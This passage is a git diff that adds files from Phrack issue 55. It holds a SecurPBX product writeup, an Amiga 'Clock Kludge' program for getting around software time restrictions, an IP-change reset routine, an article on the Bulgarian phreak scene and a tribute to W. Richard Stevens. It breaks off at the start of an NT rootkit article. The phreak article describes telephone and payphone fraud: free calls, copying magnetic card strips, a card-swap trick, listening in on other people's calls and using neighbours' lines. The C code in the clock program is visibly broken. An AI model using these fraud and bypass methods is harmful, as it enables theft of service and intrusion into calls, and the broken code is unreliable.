+ - Tamperproof
+
+
+The Solution:
+------------
+
+For a sophisticated hacker or a determined insider, it doesnt take much to
+compromise a users password and gain access to confidential resources. And
+when an unauthorized user enters a supposedly secure system all privilege
+definition and audit trail functions become virtually meaningless... in
+essence, the damage is done. Single-factor identification a reusable password
+is not enough.
+
+To identify and authenticate an authorized system user, two factors are
+necessary. Factor one is something secret only the user knows: a memorized
+personal identification number (PIN) or password. The second factor is
+something unique the user possesses: the SecurID token.
+
+Carried by authorized system users, SecurID tokens available in three models
+generate unique, one-time, unpredictable access codes every 60 seconds. To
+gain access to a protected resource, a user simply enters his or her secret
+PIN, followed by the current code displayed on the SecurID token.
+Authentication is assured when the ACM recognizes the tokens unique code in
+combination with the user's unique PIN. Patented technology synchronizes each
+token with a hardware or software ACM. The ACM may reside at a host, operating
+system, network/client resource or communications device  virtually any
+information resource that needs security.
+
+This simple, one-step login results in crackproof computer security that easy
+to use and administer. The tokens require no card readers or time-consuming
+challenge/response procedures. With SecurID tokens, reusable passwords can no
+longer be compromised. Most importantly, access control remains in the hands
+of management.
+
+ 
+SECURID PINPAD:
+--------------
+
+An added level of security can be implemented with a SecurID PINPAD token.
+The PINPAD token enables users accessing the network to login with an
+encrypted combination of the PIN and SecurID token code. Using the keypad on
+the face of the PINPAD token, a user enters his or her secret PIN directly
+into the token, which generates an encrypted passcode. This additional level
+of security is especially appropriate for users in application environments
+who are concerned that a secret PIN might be compromised through electronic
+eavesdropping.
+
+SecurID tokens are ideal for any environment. The original SecurID token
+conveniently fits into a wallet like a credit card. The SecurID key fob
+offers a new dimension in convenience to those customers requiring high
+levels of security in multiple environments, along with compact size and
+durability. In addition to providing the same reliable performance in
+generating random access codes as the original SecurID token, the SecurID key
+fob comes in a small, light- weight format.
+
+                               SecurPBX
+                               --------
+
+Ok. Plain and simple. SecurPBX is a product to protect PBX systems worldwide
+and automated Help Desk functions.
+
+SecurPBX provides remot access security for telephone lines, modem pools,
+voicemail ports, internet access lines, and the maintenance port on PBX
+systems. Used in conjunction with Security Dynamics SecurID, SecurPBX
+protects valuable PBX resources from remote access by unautorized callers
+without comprimising the conveniences of remote telephone and data access
+to teleworking or traveling employees.
+
+Callers dial specific numbers on the PBX for long distance services. As an
+adjunct to the PBX and a client to the server, SecurPBX recieves the
+callers request for resources. Functioning as a client, SecurPBX requires
+remote callers to provide SecurID user authentication and an authorized
+destination telephone number before being transfered to the desired resource.
+SecurPBX transmits the credentials to the server for authentication
+and simultaneously validates the telephone number by user specific
+permissions and denials. SecurPBX integrates with the PBX to process the
+call based on the validity of the caller via SecurID and the destination
+number attemped.
+
+
+                                     .----------.      |
+                                     |  SERVER  |---- -x- <-- Security
+                                     `----------'      |
+                                          |            |
+                                          |           _-_
+.--------------.                          |
+|     | 037592 |        ,-----.
+|     `--------'  ----- | PBX | -----  .-----------.
+| SecureID     |        `-----'        | SecurePBX |
+`--------------'                       |  Switch   |
+                           |           `-----------'
+                           |
+                            --------------- Users
+
+Each SecurID card is a visually readable credit card sized token or key which
+is programmed with Security Dynamics powerful algorithm. Each card
+automatically generates an unpredictable, one time access code every 60
+seconds. The token is conveinent to carry and simple to use and is resistant
+to being counterfeited or reversed engineered.
+
+SecurPBX extends the secure working enviroment of an organization to remote
+locations. SecurPBX applies user specific calling restrictions before any
+call is completed to prevent unauthorized toll charges and misuse of PBX
+resources. The time of day, volume of calls per user, destination telephone
+numbers (restricted to NPA and NXX) and customizable classes of service add
+a vital layer to access security without compromising the conveinience of
+having remote access to telephone resources. SecurPBX logs all successful
+and unseccessful attempts including the destination telephone number.
+Caller ID/ANI if available also provides the origination telephone number,
+pin pointing the location of the caller.
+
+Highlights of SecurPBX:
+----------------------
+
+ - Compatible with all major PBX vendor types.
+ - Cost effective remote access security for PBX resources.
+ - Prevents unauthorized access to valuable voice and data resources.
+ - Secures remote long distance, and alternative method for replacing
+   calling cards.
+
+ - Works in conjunction with each users SecurID card.
+ - Centralized network authentication and security administration.
+ - Easy to Use, voice prompting available in multiple languages.
+ - Audit trails and reporting assure true caller accountability.
+ - Caller ID/ANI option provides originating telephon number identifying
+   hacker locations.
+
+SecurPBX operates in Microsoft Windows NT enviroment. Callers and data users
+achieve seamless access to PBX resources with validation data gathered as
+efficiently as using a calling card and/or attemping a standard logon
+procedure. In many cases, SecurPBX can be a calling card replacement and
+may also be used with cellular phones to combat calling card fraud.
+Fraudulent or suspect callers are denied access before toll charges and
+resources damage occur.
+
+Typically, securing a PBX from unauthorized remote access has required
+disabling remote access to the PBX. Using dynamic, two factor authentication
+through the server and validation destination numbers dialed, SecurPBX
+systematically locks out unauthorized callers preventing toll, voicemail,
+and data fraud. This provides a secure access point for
+teleworking resources.
+
+SecurPBX uniquie voice identification:
+-------------------------------------
+
+SecurPBX is a unique indentification solution providing secure remote
+access to all major PBX or Centrex telephone systems. Protected resources
+included are:
+
+  - Long distance lines and trunks
+  - Voice mail access lines
+  - Call centers
+  - Interactive voice response systems and audio response units
+
+Access is controlled through postive identification by their unique,
+individual voice prins. SecurPBX uses SpeakEZ voice print speak
+verification service tehcnology to efficiently allow access to authorized
+callers while eliminating access to unauthorized callers. The SpeakEZ
+voice print system is recognized as the best in the voice verification
+industry today.
+
+Significant investments in telephone resources simple cannot be protected
+by traditional static passwords or PINs. When making a telephone call from
+any telephone using your calling card number, the one condition verifiable
+as certain by the PBX or phone company is that someone is making a call with
+a known authorization code, however, it could be anyone. Casual calling by
+unauthorized personnel, recognized as a major misuse of corporate telephone
+resources, must be controlled if not eliminated. SecurPBX provides that
+capability to your organization.
+
+SecurPBX prodives reliable, independant two factor user identification and
+authentication. Factor one is something the users knows: a memorized personal
+identification number or password. The Second factor is something unique
+the user possesses: his/her own voice print. Each caller is required to
+merely speak his/her chosen password which is compared to a stored voice
+print. The password can be in any language or dialect.
+
+SecurPBX extends the unique user authentication provided by SpeakEZ voice
+print to include user specific calling restrictions. Time of day, volume of
+calls per user, destination telephone numbers which are restricted to NPA
+and customizable classes of service add important layers of access security
+without compromising the convenience of remote access to telephone resources.
+
+
+Highlights:
+----------
+
+ - Compatible with all major PBX vendor-types and Centrex
+ - Cost effective remote access security for PBX resources
+ - Prevents unauthorized access to valuable voice resources
+ - Secures remote long distance
+ - Non-intrusive security, callers are validated by their own voice prints
+ - Language independent passwords
+ - Centralized authentication and security administration
+ - Easy to use, voice prompting available in multiple languages
+ - Audit trails and reporting assure true caller accountability
+ - Multiple voice prints available per user
+
+Remote Access Security Solution:
+-------------------------------
+
+Optionally, after authentication, SecurPBX administrators can manage user
+permissions and denials on from either the same SecurPBX workstation or from
+another workstation connected via a LAN or remotely by modem in a Windows
+friendly environment.
+
+Long distance callers achieve seamless access to PBX outbound trunks with
+validation criteria gathered as efficiently as a calling card and as easily
+as talking to a telephone attendant. Fraudulent or suspect callers are denied
+access before any damaging toll charges can occur.
+
+SecurPBX logs all calls, successful and unsuccessful, including the date and
+time, user ID, and destination telephone number. Depending on the PBX type,
+Calling Line Identification ANI may be used as part of the validation process
+and in those cases, will also be logged. Log information can be exported to an
+external spreadsheet application or displayed in reports generated by the
+SecurPBX Administrator.
+
+SpeakEZ Voice Print:
+-------------------
+
+SpeakEZ Voice Print Speaker Verification is a highly effective method of
+confirming a caller's identity. The service is based on the fact that each
+person's voice is uniquely different, and, as a means of identification, is
+highly reliable. Speaker Verification is an application of the SpeakEZ Voice
+Print technology which compares a digitized sample of a person's voice with
+a stored model "voice print" of that individual's voice for verification.
+
+ - Authenticates the caller as opposed to information (i.e. PIN) or a piece
+   of equipment.
+ - Easy to use, language independent
+ - Safe: a voice print cannot be lost or stolen
+ - Cost-effective: does not require special hardware for the caller
+ - Virtually fraud-proof: a voice is difficult to forge
+
+Applications of SecurPBX:
+------------------------
+
+ - Secure Telecommuting (all valuable PBX resources)
+ - Call center user authentication
+ - Securing Interactive Voice Response (IVR) and Audio Response Units (ARUs)
+ - Help Yourself suite of products for help desk automation (ASAPTM - 
+   ACE/Server Administration Program - PIN reset, SecurNT - Windows NT
+   password reset, E-Help Desk - Entrust/PKITM profile recovery)
+
+Technical Requirements:
+----------------------
+
+Telephony platforms :
+                       All major PBXs including Nortel, AT&T, Rolm and Mitel
+
+Processor           :  100% IBM compatible PC, Pentium 133 minimum 
+Disk requirement    :  Hard disk 1 gigabyte minimum, 32MB RAM for Switch I
+                       nterface, Client software, 8 MB for Administrator
+                       software, actual storage based on size of user
+                       population
+
+Capacity            :  An unlimited number of users may be administered and
+                       issued SecurID Cards. 32 simultaneous voice channels
+                       per Switch Interface
+
+Configuration       :  Multiples of 4, 12 and 24 line telephone interfaces
+
+Management          :  SecurPBX Administrator includes extensive
+                       administrative menus in user-friendly Windows 3.1 and
+                       95 environment, real time monitoring and management of
+                       multiple PBX sites
+
+Conclusion:
+----------
+
+SecurPBX is defiantely the way to go to prevent your data and PBX systems
+from getting hacked and abused.
+
+0x02>------------------------------------------------------------------------
+<++> P55/Linenoise/ckludge.c !2231f4cc
+/*                                                                          */
+/* CKludge.C (Amiga)                                                        */
+/*                                                                          */
+/* If you are a PC user you can port this C source easily.                  */
+/*                                                                          */
+/* You might even want to use it to fix your fucking millenium bug...       */
+/*                                                                          */
+/* Ha! Ha! Ha! 2000 is nigh.                                                */
+/*                                                                          */
+/* Clock Kludge 1.0 by `The Warlock'                                        */
+/*                                                                          */
+/* This little patch will freeze your clock - useful if you wish to bypass  */
+/* time restrictions imposed by many programs...                            */
+/*                                                                          */
+/* It works by patching the level 3 IRQ vector, vertical blank, to hold the */
+/* complex interface adapter internal time of day clock registers to zero.  */
+/* ($bfe801 = TOD lo, $bfe901 = TOD mid, $bfea01 = TOD hi)                  */
+/*                                                                          */
+/* Should work on all Amiga models.                                         */
+/*                                                                          */
+/* Handles relocated vector base correctly.                                 */
+/*                                                                          */
+/* Compiling info: lc2 -v (disable stack checking so no need to use le.lib) */
+/*                                                                          */
+
+#include "exec/types.h"
+#include "exec.memory.h"
+#include "exec/interrupts.h"
+#include "hardware/custom.h"
+#include "hardware/intbits.h"
+
+struct Interrupt*VertBIntr;
+long count;
+
+main()
+
+{
+
+  extern void VertBServer();
+
+*/ allocate an Interrupt node structure */
+
+    VertBIntr=(struct Interrupt *)
+      AllocMem (sizeof(struct Interrupt),MEMF_PUBLIC);
+
+    if (VertBIntr==0){
+      printf("not enough memory for interrupt server");
+      exit (100);
+
+}
+
+/* initialize the Interrupt node */
+
+VertBIntr->isNode.1n_Type=NT_INTERRUPT;
+VertBIntr->isNode.1n_Type=Pri=-60;
+VertBIntr->isNode.1n_Name="Clock Kludge";
+VertBIntr->is_Data=(APTR)&count;
+VertBIntr->is_Code=VertBServer;
+
+/* put the new interrupt server into action */
+
+AddIntServer (INTB_VERTB,VertBIntr);
+
+/* wait for user to type 'q' */
+
+printf ("Type q to quit...\n);
+while (getchar()!='q');
+
+/* remove interrupt server */
+
+RemIntServer (INTB_VERTB,VertBIntr);
+
+/* free memory */
+
+FreeMem (VertBIntr,sizeof(struct Interrupt));
+
+}
+
+/* the VertBServer might look like this */
+
+XDEF _VertBServer
+
+_VertBServer:
+
+  clr.b $bfe801  ; clear TOD lo
+  clr.b $bfe901  ; clear TOD mid
+  clr.b $bfea01  ; clear TOD high
+
+  move.l a1,a0   ; get address of count
+  addq.l #1,(a0) ; increment value of count
+  moveq #0,d0    ; continue to process other vb-servers
+  rts            ; must be rts NOT rte
+
+  end            ; eof
+<-->
+0x03>------------------------------------------------------------------------
+<++> P55/Linenoise/IPChange.asm !85660240
+*--------------------------------------*
+*
+* IPChange.Asm (DevPac) by `The Warlock'
+*
+* Nowadays almost all ISPs allocate dynamic IP addresses, meaning your IP
+* address will change for each connection you make.
+*
+* On a shitbox PC, a reset causes the CD signal on the serial port to go low,
+* meaning that the connection is lost and you must initiate another.
+*
+* On an Amiga, a reset does not pull the CD signal low, meaning that
+* reconnection is possible.
+*
+* When you reconnect, your ISP allocates another dynamic IP address, so in
+* effect, you have changed your IP address without starting a new connection!
+*
+* Create a batch file called ipchange.bat as follows:
+*
+* echo > s:reconnect
+* wait 5
+* cpu nofastrom > nil:
+* ipchange
+*
+* Make the following additions to your startup-sequence:
+*
+* if exists s:reconnect
+* delete s:reconnect > nil:
+* execute <your internet startup script>
+* else
+* endif
+*
+* Now, whenever called, ipchange.bat will reset, and automatically load your
+* internet software for quick reconnection.
+*
+*--------------------------------------*
+
+                opt     c+,d-                   case sensitive no debug
+
+                section ,code                   code section
+
+*--------------------------------------*
+
+START           bra.s   MAIN                    call main
+
+*--------------------------------------*
+
+ID              dc.b    "$VER:IPChange V1.0 by `The Warlock!",0
+
+*--------------------------------------*
+
+                cnop    0,4                     32 bit alignment
+
+MAIN            move.l  4.w,a6                  exec base a6
+                jsr     -$84(a6)                call forbid()
+
+                move.l  4.w,a6                  exec base a6
+                jsr     -$78(a6)                call disable()
+
+                lea     RESET(pc),a5            supervisor code a5
+                move.l  4.w,a6                  exec base a6
+                jsr     -$1e(a6)                call supervisor()
+
+*--------------------------------------*
+
+                cnop    0,4                     32 bit alignment
+
+RESET           lea     2,a0                    kickstart rom jump vector
+                reset                           kickstart rom remapped
+                jmp     (a0)                    kickstart rom restarted
+
+*--------------------------------------*
+
+                end                             eof
+
+*--------------------------------------*
+<-->
+0x04>------------------------------------------------------------------------
+
+                    THE BULGARIAN PHREAK SCENE
+                    ^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+                     by TOKATA (firestarter)...
+
+
+  What to say about the Bulgarian phreak scene - is there really one?
+  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Hmmm... it's a bad new - in Bulgaria there aren't any phreak-wise peoples at
+all... But almost second fucked bastard, which has a computer, is interested
+in hacking. Bastards, which don't know any  programming language; their hard
+drive is full  with games, MP3s  and porno  JPG files; hang on Internet  and
+download  hacking programs. They use  them (or ask  someone to show  how to
+work  with them) and  imagine - they a  superhackers. So Bulgaria is full of
+motherfucking lamers.
+We have an  electronic underground  magazine named  "Phreedom Magazine", but
+the hacking is  the main theme. No phreak articles, because there aren't any
+phreak authors. So, read...
+
+
+  Bulgarian phone system - the best phone system in the world!  :)))
+  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+  Hmmm... how to begin... err... So, 98% from our local tandem exchanges are
+SxS A-29 type (made by Siemens). A typical SxS exchange - no computerization,
+strowger switches, sleeve. The impedans is 600ohms, the battery by  off-hook
+is 60V, by on-hook - 10V. The resistance range  is  within 0-1600Ohms, the
+current - within 15-100mA, but usually is 40-60mA.
+  A mini Bulgarian crossbar system (KRS-200) is  used in some small villages
+(up to 200 subscribers). As transit  national exchange is  used "Crosspoint"
+(made by Siemens too) aka ESK-1000. The Crosspoint's switch is  a ESK-relay.
+ESK stands  for Edelmetal-Schnell-Kontakt  auf Deutsch. Also "Crosspoint" is
+used as local tandem in some of the big cities.
+  In Sofia (our capital) is located a  transit international exchange  MT-20
+(by THOMSON - France). Also year ago our Telco began to install real digital
+switching systems there. But the tax for these is terrible and their subscribers are companies, offices and some  bastards with a lot of money... and the
+most of capital ISPs ;)
+  The cables are quite old, there is much of background noise in the handset,
+the modem connections are terrible - with a 14.4K modem the average speed is
+1000bps, it drops you on every 3 minutes. After rain  there is no subscriber
+with normal connection.
+  So the number detection here is too hard. By us ONLY the calling party can
+drop the connection. So if you want to catch someone, you make a complaint to
+the  telco. She put on  your  Linefinder  a device, named  'dog'. That 'dog'
+effects on the switch contacts, so you can hold  the connection. After that,
+you call the Telco from the neighbors and they catch the called party number
+by the wires. But 'the dog' don't work by long distance  conversations. Also
+we have an ANI equipment, named 'AMUR' or 'SKAT', specially designed for SxS
+switches, but in the villages and very  small towns, there isn't any ANI. So
+with ANI the Telco can  catch you, but they don't use it for normal cases, I
+think, you know 'why' ;))) But if you make a call from a  different area the
+Telco can't catch you even with the  help of ANI :) But nobody knows that :(
+All the people think: "The Telco  ALWAYS CAN DETECT your number!  There is no
+chance to mislead them". Blah, what for idiots. Btw I try  to test  here the
+forced ANIF, so I hope to get it in work. In my town (47 000 citizens) we ha-
+ve ANI equipment, but all the Telco employers says - it's used only for sub-
+scribers info. The billing information here is still collecting with the help
+of photographs. No operator comes on my line when I flash the switchhook.
+
+  Signaling
+  ~~~~~~~~~~
+I devoted a 2 years on learning the signaling methods in Bulgaria, but:
+1. There aren't good tech books about signaling. In some books it is menti-
+   oned quite cursory. 70% and higher about signaling I have  learned from
+   several Phrack articles.
+2. Nobody from the local Telco in my town knows anything about this. I talked
+   with a few high educated employers, but they knew less than me :(
+
+Well, I have learned the following from  the books  (and from other places):
+N4 and N5  is used on  international circuits, otherwise R2 is used. Well, I
+know that "Crosspoint" uses R2, but I'm not  sure that the stupid  A-29 (SxS
+type) uses the R2 signaling  system. Also, I have read in a tech book, that
+(!) R2 is in-band signaling system. But we all know, that this is not true,
+because the blow-off frequency for R2 is 3825Hz.
+  The major multiplexing is FDM with 4KHz channels. So if you whistle 3825Hz
+tone in  the microphone, when speaking on LD, the other end  will hear that.
+So we try to blue box with programs. If that success, we will announce that :)
+But I think - there are line and rejector filters at  the end  of our trunks
+and the signal must  be clear (a straight sinusoide). An telco employer said
+to me, he heard about 2100Hz signal, but he wasn't sure :(  Can anyone help?
+
+  Our beloved Telco
+  ~~~~~~~~~~~~~~~~~
+  So by us, the BTC (Bulgarian Telecomunication Company) was  always monopo-
+listic. Also they try now to occupy  and take under full control all ISP  in
+Bulgaria. The local calls are not free and our taxes are the highest in Euro-
+pe. Our average salary is 100$ and we pay 0.04$ for each tax unit. There are
+also permanent taxes and other thing and for comparison if you have 200 units
+you'll pay 10$. That's 12% from the average salary in country!!! Also if you
+dial from  Canada to Bulgaria that'll  cost you 0.8$  per minute, BUT IF YOU
+CALL Canada from Bulgaria (btw we can't dial direct North America without ope-
+rator assistance) that'll cost you 2.3$ per minute he-he-he :)
+  So this year  our Telco is going to go private. There was 3  candidates to
+buy 51%  from Telco's  shares - Deutsche Telecom/Turkey firm, Telefonica and
+the Holland/Greece telcos. The price was 500 000 000$. But Telefonica and DT
+gave up in the last moment. Maybe you guess why? Nobody want to throw his mo-
+ney for Telco, that  uses 98%  SxS switches, where a  big part from  peoples
+(70%) are poor and don't make many calls (under 100 units), in which country
+you don't know what will happen tomorrow and etc...
+  So, as I've read about  Argentina's telco, I can say:  the situation is al-
+most the same. But by us there is ONLY ONE company  which control anything -
+all  the phones, pagers, a big part of  GSM network, all public  phones, runs
+the only X.25 datapac  network - BULPAC, they are also ISP... Total monopoly!
+
+  The Laws
+  ~~~~~~~~
+  Ha-ha-ha? What for  laws? Against phreaking? There is  no way :) Also nobody
+in Bulgaria don't understand what  {the fuck} term 'phreaking'  means. And not
+just the  ordinary people. If you are  in the IRC  channel #bulgaria  and ask:
+"Hey, what does the phreaking mean?", I'm sure that nobody shall know.
+Up to now, I didn't hear about someone  to get busted for phreaking. Our telco
+(and all of their employers) think - the system  is unbreakable! But they also
+have an law about devices, that are illegally  hooked to the phone line. At the
+first time you'll be warned 'bout that, and at the  second time you'll be dis-
+connected. But you  pay the  tax for  new phone  (100$) and congratulations - you
+already have a phone :)
+ So, our legislation don't contain anything about hacking, cracking, phreaking
+and  all kinds  of electronic  frauds. In Bulgaria  there is  no term  such as
+'illegal software' or 'illegal access to someone's computer'.
+
+  The PayphoneZ
+  ~~~~~~~~~~~~~
+  There is no good word to say about our shitty motherfucking Telco, even for
+payphones. You  think - you  can do  red boxing  in Bulgaria. Forget  it! Our
+Payphones a  COCOT and are  used only for local calls! There are huge, metal
+boxes :) full mechanical, no fine electronics! You can see inside a capacitor
+like a hand bomb! The Payphones worked with coins, but there was so many idi-
+ots, who took  out there  coins from the payphones with a thread (string). So
+our beloved Telco  become a mad  about this and they replace the coins with a
+special made by them  phone-coins with borders, which made them impossible to
+take out ;). As I  have said, the payphones are COCOT - you take the handset,
+hear a dialtone, dial a  number (pulse, with a  dialing disk!!!), the  called
+person answers... and then the polarity is reversed. A relay inside the phone
+notice that and after 3 seconds cuts off the mouthpiece... and the earpiece.
+  Then the hole for the money gets opened and the coin falls inside. There are
+no such terms such a coin return.
+  There is a trick to make  free calls (local) on  these phones. If you press
+the hook, when the  polarity is reversed, there is no current  on the line in
+that moment, and because there is no current in that moment, the relay
+wouldn't
+be noticed for the answer, and it wouldn't cut the mouth- earpiece.
+  Another trick is to unlock the phone and fill your pockets with coins :)
+The lock picking on these is quite easy...
+  There  was also  payphones for  international and  LD calls  operating with
+money, but 10 years before began an big inflation and  these phones died.
+Now you should to  put a lot of  coins (2-5kg) to make a 3 min  international
+call.
+So 5-6 years before our telco installed two  types of card-phones: BetCom and
+Bulfon. BetCom is  British-Bulgarian Company (GPT&BTC) and their  card phones
+are magnetic  strip style. The security of  these card was too weak  so a few
+people began to  make free phone calls. After 3 years  loosing a lot of money
+from these frauds, BetCom install new  phones and change the cards with elec-
+tronic ones, but there are still many old phones :) You just copy the
+magnetic strip of the card and here it is...
+
+The Bulfon  phones are much  intelligent. They are the same such  as these in
+Argentina and Germany. The test  signal is 16KHz, with nice LCD display, have
+button for  several languages, for replacing  exhausted cards, for signal am-
+plification and other options. I forgot to say, that both  the cardphones use
+pulse dialing. They usual don't have a  number to dial the cardphone, but for
+a  short  time the  phones in  the capital  have already  a number...  and MF
+dialing.
+
+There was a very  popular trick on Bulfon  cardphones with 2 cards - full one
+and empty one (bat at least with 1 unit). You quickly push  and pull the full
+card into the slot  and the display  begin to flash. After  that you  do this
+again and  put the  empty card. The phone remember the  units from  the first
+card and you talk for free. A big amount of people became familiar  with this
+and they  began to  use it  for and  without need. And since our telco is mad
+for  every loosed  penny, this feature  bombed out. Also I have heard, that a
+few people recharge cards and make unlimited ones (a PIC emulator), but since
+I'm  not a  cardphreaker, I don't  know much  about it. But I  know that  the
+bulfon exchange is very sophisticated and it's  very hard to  fool those. For
+example, you can't  dial more than  400 units  with  the same  card from  one
+cardphone. And yet one  funny feature - every night, a built-in modem  in the
+cardphone establish a connection with the Bulfon exchange and transfer info.
+Info such as - how many units are used, the cards serial number and much more
+(such as frauds).
+If you, for example, steal a few  cards from the  post  office, the  exchange
+send to all the phones, that cards with a number 444 xxx xxx ... are invalid.
+ Ahh... I forgot, the public phone cables  don't go through PVC or metal pi-
+pes. But... on Bulfon (and I think - and on BetCom) phones you can't just cut
+the wire and hook with a handset, because as you  know the line  device can't
+find the phone - when you  pick up the handset  on Bulfon, the exchange  send
+16KHz test signal and the phone must answer  with the same signal. The CPU of
+these is 68HC11 (Motorola).
+
+btw we have a GSM network since 1995. Also we have a pager network.
+
+Phreaking methods
+~~~~~~~~~~~~~~~~~
+As I have said, there aren't phreak wise people in Bulgaria (but almost every
+is interested in hacking). A lot of  falsely accused  'phreaks' do  pitting -
+hooking  with a  handset to a  pair of  wires or  the outside  connection box.
+Phreak methods  used by me are:
+
+-  forced 3way calling = some type of abuse the structure of the connector.
+So, in my  town the  NPA is X-YY-ZZ. So lets  imagine, that someone  called
+4-33-28. I begin to dial 4-33 and when I hit the right pause  after the 3rd
+it's puts me into their conversation.
+
+- free calling from local payphones = already talked bout that.
+
+- free calling on local and short haul calls - by dialing a chain of prefi-
+xes (such as in UK). I dial the prefix (NPA) of the town X, and after that
+dial the prefix for another place and then the number. But not every exchan
+ge allows you to make that. Your exchange waits a signal from exchange X,
+that a called party is answered, but the X waits too for that... But the
+connection is terrible... and after 3 minutes without taxing on the trunk
+your Telco cuts the connection ;(
+
+Also I think that black and blue boxing is still possible, but didn't test
+it entirely.
+
+ There also "hidden" long distance numbers and prefixes, which are very use-
+ful in some cases (I also found 3-4 of them), but nobody try to find it :(
+There aren't  free numbers in Bulgaria, except these  for police, fire alarm,
+hospital and the telco number for  failure complaints, but they  are ONLY FOR
+LOCAL DIALING! I also discover a method to  call these as trunk-calls, BUT...
+but our phone  system is made so, that if on a trunk-call  there isn't  a tax
+signal coming after 3 minutes, the call is terminated.
+   Some people with knowledge of electronic also make "free calls" through
+their neighbor's lines, but BTC is familiar with those methods and  it always
+check the line (plus these  of the neighbors) when a subscriber made a com-
+plaint for big bill.
+ In Bulgaria there are NO PBX-es, Voice Mail Systems, WATS numbers, Call for-
+warding, Call waiting, DTMF requesting, Speed dialing and other.
+ About PBX - some of our factories  have PBX-es, but I still learn how to use/
+abuse them.
+
+In almost every town with more than 10 000 subscribers we have a conference
+phone, which can  be dialed only  local (errrr... quite not true ;))  for 1
+tax unit per  3/5/10/30 minutes. But the stupid people don't  know that and
+in many towns (such as mine) this phone is *forever* free.
+
+ I also have heard about peoples, which emulate the GSM SIM card to make free
+calls.
+
+
+PHREAK'EM ALL!!!
+
+             
+0x05>------------------------------------------------------------------------
+
+----[  PDM
+
+Phrack Doughnut Movie (PDM) last issue was `Dark City`.
+
+PDM54 recipients:
+
+    I forget.  I think Adam Shostack was definitely one.  It's been a while
+    though.
+
+PDM55 Challenge:
+
+    "Beware my wrath."
+
+0x06>------------------------------------------------------------------------
+
+----[  Super Elite People That REad Phrack (SEPTREP)
+
+New additions:      
+
+
+Why they are SEP:   
+
+----[  Current List
+
+W. Richard Stevens
+Ron Rivest
+
+-----------------------------------------------------------------------------
+
+----[  EOF
diff --git a/phrack55/4.txt b/phrack55/4.txt
new file mode 100644
index 0000000..5b027c7
--- /dev/null
+++ b/phrack55/4.txt
@@ -0,0 +1,64 @@
+-------[  Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 04 of 19  ]
+
+
+-------------------------[  P H R A C K     5 5     P R O P H I L E  ]
+
+
+
+This issue we're doing something a bit differently.  Normally, this file is
+reserved for the Phrack Prophile.  However, this issue, we are instead paying
+homage to a recently deceased esteemed member of the upper echelon of the
+computer elite.  This is our little way of providing a tribute to the most
+widely read TCP/IP author in history.  
+
+I first read Stevens in 1992.  I still have that first edition UNIX Network
+Programming book sitting on my shelf.  I learned a great deal from that book,
+but that was nothing compared to how much the TCP/IP Illustrated series taught
+me...  I remember getting vol. I in 1994..  I still have that one too, all
+marked up with highlighters and whatnot...  Before I knew it, I found myself 
+firmly immersed in IP networks (I even read vol. II from cover to cover).
+I know I have Stevens to thank for sparking that interest in me.  His death
+is a great loss.
+
+There is also another reason why W. Richard Stevens is featured here -- he was
+to be the prophile for Phrack 55.
+
+I sent Richard email initially on August 31st asking him if he would have
+time to be profiled for Phrack 55.  To my great delight (and somewhat suprise)
+he agreed!  I emailed him the template, and sent him a follow-up email...
+The last I heard from him was on September 1st, telling me that he was
+pretty busy and needed some time to look it over.  Sadly this is also the
+day he died.  These emails will not appear here out of respect for Stevens
+and his family.  Instead, republished here is a copy of his obiturary from
+www.bigdealclassifieds.com.
+
+STEVENS, W. Richard, noted author of computer books died on September 1.
+He is best known for his ``UNIX Network Programming'' series (1990, 1998,
+1999),  ``Advanced Programming in the UNIX Environment'' (1992), and ``TCP/IP
+Illustrated'' series (1994, 1995, 1996).  Richard was born in 1951 in Luanshya,
+Northern Rhodesia (now Zambia), where his father worked for the copper
+industry.  The family moved to Salt Lake City, Hurley, New Mexico, Washington,
+DC and Phalaborwa, South Africa. Richard attended Fishburne Military School in
+Waynesboro, Virginia. He received a B.SC. in Aerospace Engineering from the
+University of Michigan in 1973, and an M.S. (1978) and Ph.D. (1982) in Systems
+Engineering from the University of Arizona.  He moved to Tucson in 1975 and
+from then until 1982 he was employed at Kitt Peak National Observatory as a
+computer programmer.  From 1982 until 1990 he was Vice President of Computing
+Services at Health Systems International in New Haven, CT, moving back to
+Tucson in 1990. Here he pursued his career as an author and consultant.  He
+was also an avid pilot and a part-time flight instructor during the 1970's.
+He is survived by his loving wife of 20 years, Sally Hodges Stevens; three
+wonderful children, Bill, Ellen and David; sister, Claire Stevens of Las Vegas,
+NV; brother, Bob and wife Linda Stevens of Dallas, TX; nieces, Laura, Sarah,
+Collette, Christy; and nephew, Brad. He is predeceased by his parents, Royale
+J. Stevens (1915-1984); and Helen Patterson Stevens (1916-1997).  Helen lived
+in Tucson from 1991-1997, and Royale lived here in the early 1930's attending
+Tucson High School while his father was treated for TB at the Desert
+Sanitorium (now TMC).  The family asks that in lieu of flowers, donations
+be made in Richard's name to Habitat for Humanity, 2950 E. 22nd Street,
+Tucson, AZ 85713.
+
+
+-- route
+
+----[  EOF
diff --git a/phrack55/5.txt b/phrack55/5.txt
new file mode 100644
index 0000000..c66283f
--- /dev/null
+++ b/phrack55/5.txt
@@ -0,0 +1,1687 @@
+-------[  Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 05 of 19  ]
+
+
+-------------------------[  A *REAL* NT Rootkit, patching the NT Kernel  ]
+
+
+--------[  Greg Hoglund <hoglund@ieway.com>  ]
+
+
+Introduction
+------------
+
+First of all, programs such as Back Orifice and Netbus are NOT rootkits.  They
+are amateur versions of PC-Anywhere, SMS, or a slew of other commercial
+applications that do the same thing.  If you want to remote control a
+workstation, you could just as easily purchase the incredibly powerful SMS
+system from Microsoft.  A remote-desktop/administration application is NOT a
+rootkit.
+
+What is a rootkit?  A rootkit is a set of programs which *PATCH* and *TROJAN*
+existing execution paths within the system.  This process violates the
+*INTEGRITY* of the TRUSTED COMPUTING BASE (TCB).  In other words, a rootkit is
+something which inserts backdoors into existing programs, and patches or breaks
+the existing security system.
+
+- A rootkit may disable auditing when a certain user is logged on.
+- A rootkit could allow anyone to log in if a certain "backdoor" password is
+  used.
+- A rootkit could patch the kernel itself, allowing anyone to run privileged
+  code if they use a special filename.
+
+The possibilities are endless, but the point is that the "rootkit" involves
+itself in pre-existing architecture, so that it goes un-noticed.  A remote
+administration application such as PC Anywhere is exactly that, an application.
+A rootkit, on the other hand, patches the already existing paths within the
